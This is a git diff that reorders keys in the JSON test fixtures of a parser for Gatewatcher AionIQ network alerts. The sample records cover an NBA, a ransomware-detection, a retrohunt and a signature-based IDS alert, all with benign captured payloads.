\"event\",\n    \"module\": \"sigflow_file\",\n    \"category\": [\n      \"network\",\n      \"file\"\n    ],\n    \"created\": \"2024-09-11T13:55:51.326090+0000\",\n    \"dataset\": \"network_metadata\",\n    \"id\": \"d66539e6-825e-4516-8c8c-2778dd6d9358\"\n  }\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/nba.json b/GateWatcher/aioniq_ecs/tests/nba.json
index c4540e394..956e08288 100644
--- a/GateWatcher/aioniq_ecs/tests/nba.json
+++ b/GateWatcher/aioniq_ecs/tests/nba.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n      \"version\": \"2.5.3.107\",\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"mon0\"\n        }\n      }\n    },\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"alert\",\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"module\": \"network_behavior_analytics\",\n    \"created\": \"2022-09-01T16:06:15.605Z\",\n    \"id\": \"730a47f1-f7b1-4faa-9d61-8a41d7b138ed\",\n    \"severity\": 2\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"network\": {\n    \"transport\": \"tcp\",\n    \"protocol\": \"http\",\n    \"flow_id\": 2071994639527866,\n    \"community_id\": \"1:Q22WBDRnlyCXH/Y/pcypXCr+nJc=\",\n    \"timestamp\": \"2022-09-01T16:06:15.605Z\",\n    \"tx_id\": 0\n  },\n  \"source\": {\n    \"ip\": \"10.2.6.250\",\n    \"port\": 50886,\n    \"mac\": \"00:50:56:91:73:14\"\n  },\n  \"destination\": {\n    \"ip\": \"13.107.4.52\",\n    \"port\": 80,\n    \"mac\": \"00:08:e3:ff:fc:28\"\n  },\n  \"nba\": {\n    \"packet\": \"AAjj//woAFBWkXMUCABFAAAo6pNAAEAGLaIKAgb6DWsENMbGAFBecku30OsVlVAQAfUzhAAAAAAAAAAA\",\n    \"payload\": \"R0VUIC9jb25uZWN0dGVzdC50eHQgSFRUUC8xLjENClByYWdtYTogbm8tY2FjaGUNClVzZXItQWdlbnQ6IE1pY3Jvc29mdCBOQ1NJDQpIb3N0OiB3d3cubXNmdGNvbm5lY3R0ZXN0LmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K\",\n    \"payload_printable\": \"GET /connecttest.txt HTTP/1.1\\r\\nPragma: no-cache\\r\\nUser-Agent: Microsoft NCSI\\r\\nHost: www.msftconnecttest.com\\r\\nCache-Control: no-cache\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n    \"signature_id\": 2031071,\n    \"gid\": 1,\n    \"category\": \"Network Behavior Analytics\",\n    \"action\": \"allowed\",\n    \"signature\": \"NBA C&C tracker : cobalt strike tcp initialization\",\n    \"metadata\": {\n      \"performance_impact\": [\n        \"High\"\n      ],\n      \"signature_severity\": [\n        \"CRITICAL\"\n      ]\n    },\n    \"rev\": 1,\n    \"stream\": 1\n  },\n  \"http\": {\n    \"url\": \"/connecttest.txt\",\n    \"http_user_agent\": \"Microsoft NCSI\",\n    \"version\": \"HTTP/1.1\",\n    \"hostname\": \"www.msftconnecttest.com\",\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"response\": {\n      \"bytes\": 22,\n      \"status_code\": 200,\n      \"mime_type\": \"text/plain\"\n    }\n  },\n  \"url\": {\n    \"domain\": \"www.msftconnecttest.com\",\n    \"path\": \"/connecttest.txt\"\n  },\n  \"user_agent\": {\n    \"original\": \"Microsoft NCSI\"\n  },\n  \"packet_info\": {\n    \"linktype\": 1\n  },\n  \"flow\": {\n    \"bytes_toclient\": 700,\n    \"pkts_toclient\": 3,\n    \"bytes_toserver\": 407,\n    \"pkts_toserver\": 4,\n    \"start\": \"2022-09-01T16:06:15.602042+0000\"\n  },\n  \"@version\": \"1\",\n  \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ V103",
         "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
       }
-    },
-    "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n      \"version\": \"2.5.3.107\",\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"mon0\"\n        }\n      }\n    },\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"alert\",\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"module\": \"network_behavior_analytics\",\n    \"created\": \"2022-09-01T16:06:15.605Z\",\n    \"id\": \"730a47f1-f7b1-4faa-9d61-8a41d7b138ed\",\n    \"severity\": 2\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"network\": {\n    \"transport\": \"tcp\",\n    \"protocol\": \"http\",\n    \"flow_id\": 2071994639527866,\n    \"community_id\": \"1:Q22WBDRnlyCXH/Y/pcypXCr+nJc=\",\n    \"timestamp\": \"2022-09-01T16:06:15.605Z\",\n    \"tx_id\": 0\n  },\n  \"source\": {\n    \"ip\": \"10.2.6.250\",\n    \"port\": 50886,\n    \"mac\": \"00:50:56:91:73:14\"\n  },\n  \"destination\": {\n    \"ip\": \"13.107.4.52\",\n    \"port\": 80,\n    \"mac\": \"00:08:e3:ff:fc:28\"\n  },\n  \"nba\": {\n    \"packet\": \"AAjj//woAFBWkXMUCABFAAAo6pNAAEAGLaIKAgb6DWsENMbGAFBecku30OsVlVAQAfUzhAAAAAAAAAAA\",\n    \"payload\": \"R0VUIC9jb25uZWN0dGVzdC50eHQgSFRUUC8xLjENClByYWdtYTogbm8tY2FjaGUNClVzZXItQWdlbnQ6IE1pY3Jvc29mdCBOQ1NJDQpIb3N0OiB3d3cubXNmdGNvbm5lY3R0ZXN0LmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K\",\n    \"payload_printable\": \"GET /connecttest.txt HTTP/1.1\\r\\nPragma: no-cache\\r\\nUser-Agent: Microsoft NCSI\\r\\nHost: www.msftconnecttest.com\\r\\nCache-Control: no-cache\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n    \"signature_id\": 2031071,\n    \"gid\": 1,\n    \"category\": \"Network Behavior Analytics\",\n    \"action\": \"allowed\",\n    \"signature\": \"NBA C&C tracker : cobalt strike tcp initialization\",\n    \"metadata\": {\n      \"performance_impact\": [\n        \"High\"\n      ],\n      \"signature_severity\": [\n        \"CRITICAL\"\n      ]\n    },\n    \"rev\": 1,\n    \"stream\": 1\n  },\n  \"http\": {\n    \"url\": \"/connecttest.txt\",\n    \"http_user_agent\": \"Microsoft NCSI\",\n    \"version\": \"HTTP/1.1\",\n    \"hostname\": \"www.msftconnecttest.com\",\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"response\": {\n      \"bytes\": 22,\n      \"status_code\": 200,\n      \"mime_type\": \"text/plain\"\n    }\n  },\n  \"url\": {\n    \"domain\": \"www.msftconnecttest.com\",\n    \"path\": \"/connecttest.txt\"\n  },\n  \"user_agent\": {\n    \"original\": \"Microsoft NCSI\"\n  },\n  \"packet_info\": {\n    \"linktype\": 1\n  },\n  \"flow\": {\n    \"bytes_toclient\": 700,\n    \"pkts_toclient\": 3,\n    \"bytes_toserver\": 407,\n    \"pkts_toserver\": 4,\n    \"start\": \"2022-09-01T16:06:15.602042+0000\"\n  },\n  \"@version\": \"1\",\n  \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}"
+    }
   },
   "expected": {
     "message": "{\n  \"observer\": {\n    \"hostname\": \"gcenter-interne-rd-56.gatewatcher.com\",\n    \"product\": \"gcenter\",\n    \"version\": \"2.5.3.103\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"hostname\": \"gcap-interne-rd-55.gatewatcher.com\",\n      \"version\": \"2.5.3.107\",\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"mon0\"\n        }\n      }\n    },\n    \"log_format_version\": \"1.0.0\"\n  },\n  \"event\": {\n    \"kind\": \"alert\",\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"module\": \"network_behavior_analytics\",\n    \"created\": \"2022-09-01T16:06:15.605Z\",\n    \"id\": \"730a47f1-f7b1-4faa-9d61-8a41d7b138ed\",\n    \"severity\": 2\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"network\": {\n    \"transport\": \"tcp\",\n    \"protocol\": \"http\",\n    \"flow_id\": 2071994639527866,\n    \"community_id\": \"1:Q22WBDRnlyCXH/Y/pcypXCr+nJc=\",\n    \"timestamp\": \"2022-09-01T16:06:15.605Z\",\n    \"tx_id\": 0\n  },\n  \"source\": {\n    \"ip\": \"10.2.6.250\",\n    \"port\": 50886,\n    \"mac\": \"00:50:56:91:73:14\"\n  },\n  \"destination\": {\n    \"ip\": \"13.107.4.52\",\n    \"port\": 80,\n    \"mac\": \"00:08:e3:ff:fc:28\"\n  },\n  \"nba\": {\n    \"packet\": \"AAjj//woAFBWkXMUCABFAAAo6pNAAEAGLaIKAgb6DWsENMbGAFBecku30OsVlVAQAfUzhAAAAAAAAAAA\",\n    \"payload\": \"R0VUIC9jb25uZWN0dGVzdC50eHQgSFRUUC8xLjENClByYWdtYTogbm8tY2FjaGUNClVzZXItQWdlbnQ6IE1pY3Jvc29mdCBOQ1NJDQpIb3N0OiB3d3cubXNmdGNvbm5lY3R0ZXN0LmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K\",\n    \"payload_printable\": \"GET /connecttest.txt HTTP/1.1\\r\\nPragma: no-cache\\r\\nUser-Agent: Microsoft NCSI\\r\\nHost: www.msftconnecttest.com\\r\\nCache-Control: no-cache\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n    \"signature_id\": 2031071,\n    \"gid\": 1,\n    \"category\": \"Network Behavior Analytics\",\n    \"action\": \"allowed\",\n    \"signature\": \"NBA C&C tracker : cobalt strike tcp initialization\",\n    \"metadata\": {\n      \"performance_impact\": [\n        \"High\"\n      ],\n      \"signature_severity\": [\n        \"CRITICAL\"\n      ]\n    },\n    \"rev\": 1,\n    \"stream\": 1\n  },\n  \"http\": {\n    \"url\": \"/connecttest.txt\",\n    \"http_user_agent\": \"Microsoft NCSI\",\n    \"version\": \"HTTP/1.1\",\n    \"hostname\": \"www.msftconnecttest.com\",\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"response\": {\n      \"bytes\": 22,\n      \"status_code\": 200,\n      \"mime_type\": \"text/plain\"\n    }\n  },\n  \"url\": {\n    \"domain\": \"www.msftconnecttest.com\",\n    \"path\": \"/connecttest.txt\"\n  },\n  \"user_agent\": {\n    \"original\": \"Microsoft NCSI\"\n  },\n  \"packet_info\": {\n    \"linktype\": 1\n  },\n  \"flow\": {\n    \"bytes_toclient\": 700,\n    \"pkts_toclient\": 3,\n    \"bytes_toserver\": 407,\n    \"pkts_toserver\": 4,\n    \"start\": \"2022-09-01T16:06:15.602042+0000\"\n  },\n  \"@version\": \"1\",\n  \"@timestamp\": \"2022-09-01T16:06:51.664Z\"\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/ransomware.json b/GateWatcher/aioniq_ecs/tests/ransomware.json
index 38d350641..cfac8fd46 100644
--- a/GateWatcher/aioniq_ecs/tests/ransomware.json
+++ b/GateWatcher/aioniq_ecs/tests/ransomware.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\n  \"source\": {\n    \"ip\": \"172.31.47.105\",\n    \"port\": 50066\n  },\n  \"event\": {\n    \"created\": \"2024-09-13T09:11:20.223813+00:00\",\n    \"dataset\": \"alert\",\n    \"end\": \"2024-09-13T09:09:11.988000\",\n    \"module\": \"ransomware_detect\",\n    \"kind\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"start\": \"2024-09-13T09:08:51.988000\",\n    \"id\": \"f357f7d1-e322-4f67-b798-50d05f54204b\",\n    \"severity\": 1\n  },\n  \"observer\": {\n    \"product\": \"gcenter\",\n    \"log_format_version\": \"1.0.0\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"version\": \"2.5.4.0-rc1\",\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\"\n  },\n  \"destination\": {\n    \"ip\": \"172.31.33.0\",\n    \"port\": 445\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"ransomware\": {\n    \"alert_threshold\": 648,\n    \"malicious_behavior_confidence\": 80,\n    \"session_score\": 37\n  },\n  \"@timestamp\": \"2024-09-13T09:11:39.629080222Z\",\n  \"smb\": {\n    \"session_id\": 593737889611873\n  },\n  \"network\": {\n    \"protocol\": \"smb\",\n    \"flow_id\": 1465670492342121,\n    \"transport\": \"tcp\",\n    \"timestamp\": \"2024-09-13T09:08:44.877000+00:00\",\n    \"community_id\": \"1:RA5iYDlaiu3WMutFLj5r//rbk34=\"\n  },\n  \"@version\": \"1\"\n}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ V103",
         "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
       }
-    },
-    "message": "{\n  \"source\": {\n    \"ip\": \"172.31.47.105\",\n    \"port\": 50066\n  },\n  \"event\": {\n    \"created\": \"2024-09-13T09:11:20.223813+00:00\",\n    \"dataset\": \"alert\",\n    \"end\": \"2024-09-13T09:09:11.988000\",\n    \"module\": \"ransomware_detect\",\n    \"kind\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"start\": \"2024-09-13T09:08:51.988000\",\n    \"id\": \"f357f7d1-e322-4f67-b798-50d05f54204b\",\n    \"severity\": 1\n  },\n  \"observer\": {\n    \"product\": \"gcenter\",\n    \"log_format_version\": \"1.0.0\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"version\": \"2.5.4.0-rc1\",\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\"\n  },\n  \"destination\": {\n    \"ip\": \"172.31.33.0\",\n    \"port\": 445\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"ransomware\": {\n    \"alert_threshold\": 648,\n    \"malicious_behavior_confidence\": 80,\n    \"session_score\": 37\n  },\n  \"@timestamp\": \"2024-09-13T09:11:39.629080222Z\",\n  \"smb\": {\n    \"session_id\": 593737889611873\n  },\n  \"network\": {\n    \"protocol\": \"smb\",\n    \"flow_id\": 1465670492342121,\n    \"transport\": \"tcp\",\n    \"timestamp\": \"2024-09-13T09:08:44.877000+00:00\",\n    \"community_id\": \"1:RA5iYDlaiu3WMutFLj5r//rbk34=\"\n  },\n  \"@version\": \"1\"\n}"
+    }
   },
   "expected": {
     "message": "{\n  \"source\": {\n    \"ip\": \"172.31.47.105\",\n    \"port\": 50066\n  },\n  \"event\": {\n    \"created\": \"2024-09-13T09:11:20.223813+00:00\",\n    \"dataset\": \"alert\",\n    \"end\": \"2024-09-13T09:09:11.988000\",\n    \"module\": \"ransomware_detect\",\n    \"kind\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"start\": \"2024-09-13T09:08:51.988000\",\n    \"id\": \"f357f7d1-e322-4f67-b798-50d05f54204b\",\n    \"severity\": 1\n  },\n  \"observer\": {\n    \"product\": \"gcenter\",\n    \"log_format_version\": \"1.0.0\",\n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",\n    \"vendor\": \"gatewatcher\",\n    \"gcap\": {\n      \"ingress\": {\n        \"interface\": {\n          \"name\": \"monvirt\"\n        }\n      },\n      \"version\": \"2.5.4.0-rc1\",\n      \"hostname\": \"gcap-clement-l.gatewatcher.fr\"\n    },\n    \"version\": \"2.5.3.103\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\"\n  },\n  \"destination\": {\n    \"ip\": \"172.31.33.0\",\n    \"port\": 445\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"ransomware\": {\n    \"alert_threshold\": 648,\n    \"malicious_behavior_confidence\": 80,\n    \"session_score\": 37\n  },\n  \"@timestamp\": \"2024-09-13T09:11:39.629080222Z\",\n  \"smb\": {\n    \"session_id\": 593737889611873\n  },\n  \"network\": {\n    \"protocol\": \"smb\",\n    \"flow_id\": 1465670492342121,\n    \"transport\": \"tcp\",\n    \"timestamp\": \"2024-09-13T09:08:44.877000+00:00\",\n    \"community_id\": \"1:RA5iYDlaiu3WMutFLj5r//rbk34=\"\n  },\n  \"@version\": \"1\"\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/retrohunt.json b/GateWatcher/aioniq_ecs/tests/retrohunt.json
index 2ac0df9b6..543d85db7 100644
--- a/GateWatcher/aioniq_ecs/tests/retrohunt.json
+++ b/GateWatcher/aioniq_ecs/tests/retrohunt.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\n  \"observer\": {\n    \"id\": \"\"\n  },\n  \"event\": {\n    \"kind\": \"alert\",\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"module\": \"retrohunt\",\n    \"created\": \"2022-12-14T09:51:30.455Z\",\n    \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\",\n    \"severity\": 2\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"network\": {\n    \"ether\": \"\"\n  },\n  \"source\": {\n    \"ip\": \"127.0.0.1\",\n    \"port\": \"80\"\n  },\n  \"destination\": {\n    \"ip\": \"127.0.0.1\",\n    \"port\": \"8080\"\n  },\n  \"matched_event\": {\n    \"id\": \"1\"\n  },\n  \"ioc\": {\n    \"id\": \"1\"\n  },\n  \"@timestamp\": \"2022-09-01T12:49:07.749Z\"\n}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ V103",
         "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
       }
-    },
-    "message": "{\n  \"observer\": {\n    \"id\": \"\"\n  },\n  \"event\": {\n    \"kind\": \"alert\",\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"module\": \"retrohunt\",\n    \"created\": \"2022-12-14T09:51:30.455Z\",\n    \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\",\n    \"severity\": 2\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"network\": {\n    \"ether\": \"\"\n  },\n  \"source\": {\n    \"ip\": \"127.0.0.1\",\n    \"port\": \"80\"\n  },\n  \"destination\": {\n    \"ip\": \"127.0.0.1\",\n    \"port\": \"8080\"\n  },\n  \"matched_event\": {\n    \"id\": \"1\"\n  },\n  \"ioc\": {\n    \"id\": \"1\"\n  },\n  \"@timestamp\": \"2022-09-01T12:49:07.749Z\"\n}"
+    }
   },
   "expected": {
     "message": "{\n  \"observer\": {\n    \"id\": \"\"\n  },\n  \"event\": {\n    \"kind\": \"alert\",\n    \"dataset\": \"alert\",\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"module\": \"retrohunt\",\n    \"created\": \"2022-12-14T09:51:30.455Z\",\n    \"id\": \"8223b432-7e97-4570-a29d-254f41dbb9db\",\n    \"severity\": 2\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"network\": {\n    \"ether\": \"\"\n  },\n  \"source\": {\n    \"ip\": \"127.0.0.1\",\n    \"port\": \"80\"\n  },\n  \"destination\": {\n    \"ip\": \"127.0.0.1\",\n    \"port\": \"8080\"\n  },\n  \"matched_event\": {\n    \"id\": \"1\"\n  },\n  \"ioc\": {\n    \"id\": \"1\"\n  },\n  \"@timestamp\": \"2022-09-01T12:49:07.749Z\"\n}",
diff --git a/GateWatcher/aioniq_ecs/tests/sigflow_alert.json b/GateWatcher/aioniq_ecs/tests/sigflow_alert.json
index 2994c798a..1bcd1b452 100644
--- a/GateWatcher/aioniq_ecs/tests/sigflow_alert.json
+++ b/GateWatcher/aioniq_ecs/tests/sigflow_alert.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{  \n  \"observer\": {    \n    \"vendor\": \"gatewatcher\",    \n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",    \n    \"gcap\": {      \n      \"ingress\": {        \n        \"interface\": {          \n         \"name\": \"monvirt\"        \n         }      \n       },      \n    \"hostname\": \"gcap-clement-l.gatewatcher.fr\",      \n    \"version\": \"2.5.4.0-rc1\"    \n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"mac\": \"00:6f:37:76:51:45\",\n    \"port\": 62832,\n    \"ip\": \"65.100.113.120\"\n  },\n  \"metadata\": {\n    \"flowbits\": [\n      \"http.dottedquadhost.pdf\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-11T13:55:34.006Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"community_id\": \"1:8T6+TppVoaMkXwi+BTjnzAYozVc=\",\n    \"timestamp\": \"2024-09-11T13:55:01.080901+0000\",\n    \"transport\": \"tcp\",\n    \"tx_id\": 0,\n    \"flow_id\": 1331841998337663\n  },\n  \"destination\": {\n    \"mac\": \"00:43:70:57:75:55\",\n    \"port\": 80,\n    \"ip\": \"56.53.117.115\"\n  },\n  \"flow\": {\n    \"bytes_toclient\": 1362,\n    \"bytes_toserver\": 358,\n    \"pkts_toclient\": 3,\n    \"start\": \"2024-09-11T13:55:01.079487+0000\",\n    \"pkts_toserver\": 4\n  },\n  \"url\": {\n    \"domain\": \"56.53.117.115\",\n    \"path\": \"/malcore_10KB_clean.pdf\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"56.53.117.115\",\n    \"version\": \"HTTP/1.1\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/pdf\",\n      \"bytes\": 1135\n    }\n  },\n  \"sigflow\": {\n    \"action\": \"allowed\",\n    \"metadata\": {\n      \"signature_severity\": [\n        \"Informational\"\n      ],\n      \"attack_target\": [\n        \"Client_Endpoint\"\n      ],\n      \"created_at\": [\n        \"2019_04_23\"\n      ],\n      \"deployment\": [\n        \"Perimeter\"\n      ],\n      \"performance_impact\": [\n        \"Significant\"\n      ],\n      \"updated_at\": [\n        \"2022_11_21\"\n      ]\n    },\n    \"signature\": \"ET INFO Dotted Quad Host PDF Request\",\n    \"payload_printable\": \"GET /malcore_10KB_clean.pdf HTTP/1.1\\r\\nHost: 56.53.117.115\\r\\nAccept-Encoding: gzip,compress,deflate\\r\\nKeep-Alive: 300\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n    \"packet\": \"AENwV3VVAG83dlFFCABFAAAoAAEAAEAGGktBZHF4ODV1c/VwAFAa9wCtFhR7nlAQIACMOAAA\",\n    \"stream\": 1,\n    \"signature_id\": 2027265,\n    \"rev\": 4,\n    \"category\": \"Potentially Bad Traffic\",\n    \"gid\": 1,\n    \"packet_info\": {\n      \"linktype\": 1\n    },\n    \"payload\": \"R0VUIC9tYWxjb3JlXzEwS0JfY2xlYW4ucGRmIEhUVFAvMS4xDQpIb3N0OiA1Ni41My4xMTcuMTE1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsY29tcHJlc3MsZGVmbGF0ZQ0KS2VlcC1BbGl2ZTogMzAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==\"\n  },\n  \"event\": {\n    \"dataset\": \"alert\",\n    \"kind\": \"alert\",\n    \"module\": \"sigflow_alert\",\n    \"severity\": 2,\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"id\": \"58c28570-6c90-4ba9-b9b5-f72867d5fa08\",\n    \"created\": \"2024-09-11T13:55:01.080901+0000\"\n  }\n}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ V103",
         "dialect_uuid": "e9fbba55-89c2-4b6c-ad15-9a46412dd680"
       }
-    },
-    "message": "{  \n  \"observer\": {    \n    \"vendor\": \"gatewatcher\",    \n    \"uuid\": \"78f4fed1-c9ad-52b9-b509-6b87767f501f\",    \n    \"gcap\": {      \n      \"ingress\": {        \n        \"interface\": {          \n         \"name\": \"monvirt\"        \n         }      \n       },      \n    \"hostname\": \"gcap-clement-l.gatewatcher.fr\",      \n    \"version\": \"2.5.4.0-rc1\"    \n    },\n    \"version\": \"2.5.3.103\",\n    \"log_format_version\": \"1.0.0\",\n    \"hostname\": \"gcenter-clelyo-01.gatewatcher.com\",\n    \"product\": \"gcenter\"\n  },\n  \"source\": {\n    \"mac\": \"00:6f:37:76:51:45\",\n    \"port\": 62832,\n    \"ip\": \"65.100.113.120\"\n  },\n  \"metadata\": {\n    \"flowbits\": [\n      \"http.dottedquadhost.pdf\"\n    ]\n  },\n  \"@timestamp\": \"2024-09-11T13:55:34.006Z\",\n  \"@version\": \"1\",\n  \"network\": {\n    \"protocol\": \"http\",\n    \"community_id\": \"1:8T6+TppVoaMkXwi+BTjnzAYozVc=\",\n    \"timestamp\": \"2024-09-11T13:55:01.080901+0000\",\n    \"transport\": \"tcp\",\n    \"tx_id\": 0,\n    \"flow_id\": 1331841998337663\n  },\n  \"destination\": {\n    \"mac\": \"00:43:70:57:75:55\",\n    \"port\": 80,\n    \"ip\": \"56.53.117.115\"\n  },\n  \"flow\": {\n    \"bytes_toclient\": 1362,\n    \"bytes_toserver\": 358,\n    \"pkts_toclient\": 3,\n    \"start\": \"2024-09-11T13:55:01.079487+0000\",\n    \"pkts_toserver\": 4\n  },\n  \"url\": {\n    \"domain\": \"56.53.117.115\",\n    \"path\": \"/malcore_10KB_clean.pdf\"\n  },\n  \"ecs\": {\n    \"version\": \"8.6.0\"\n  },\n  \"http\": {\n    \"request\": {\n      \"method\": \"GET\"\n    },\n    \"hostname\": \"56.53.117.115\",\n    \"version\": \"HTTP/1.1\",\n    \"response\": {\n      \"status\": 200,\n      \"mime_type\": \"application/pdf\",\n      \"bytes\": 1135\n    }\n  },\n  \"sigflow\": {\n    \"action\": \"allowed\",\n    \"metadata\": {\n      \"signature_severity\": [\n        \"Informational\"\n      ],\n      \"attack_target\": [\n        \"Client_Endpoint\"\n      ],\n      \"created_at\": [\n        \"2019_04_23\"\n      ],\n      \"deployment\": [\n        \"Perimeter\"\n      ],\n      \"performance_impact\": [\n        \"Significant\"\n      ],\n      \"updated_at\": [\n        \"2022_11_21\"\n      ]\n    },\n    \"signature\": \"ET INFO Dotted Quad Host PDF Request\",\n    \"payload_printable\": \"GET /malcore_10KB_clean.pdf HTTP/1.1\\r\\nHost: 56.53.117.115\\r\\nAccept-Encoding: gzip,compress,deflate\\r\\nKeep-Alive: 300\\r\\nConnection: keep-alive\\r\\n\\r\\n\",\n    \"packet\": \"AENwV3VVAG83dlFFCABFAAAoAAEAAEAGGktBZHF4ODV1c/VwAFAa9wCtFhR7nlAQIACMOAAA\",\n    \"stream\": 1,\n    \"signature_id\": 2027265,\n    \"rev\": 4,\n    \"category\": \"Potentially Bad Traffic\",\n    \"gid\": 1,\n    \"packet_info\": {\n      \"linktype\": 1\n    },\n    \"payload\": \"R0VUIC9tYWxjb3JlXzEwS0JfY2xlYW4ucGRmIEhUVFAvMS4xDQpIb3N0OiA1Ni41My4xMTcuMTE1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsY29tcHJlc3MsZGVmbGF0ZQ0KS2VlcC1BbGl2ZTogMzAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==\"\n  },\n  \"event\": {\n    \"dataset\": \"alert\",\n    \"kind\": \"alert\",\n    \"module\": \"sigflow_alert\",\n    \"severity\": 2,\n    \"category\": [\n      \"network\",\n      \"intrusion_detection\"\n    ],\n    \"id\": \"58c28570-6c90-4ba9-b9b5-f72867d5fa08\",\n    \"created\": \"2024-09-11T13:55:01.080901+0000\"\n  }\n}"
+    }
   },
   "expected": {
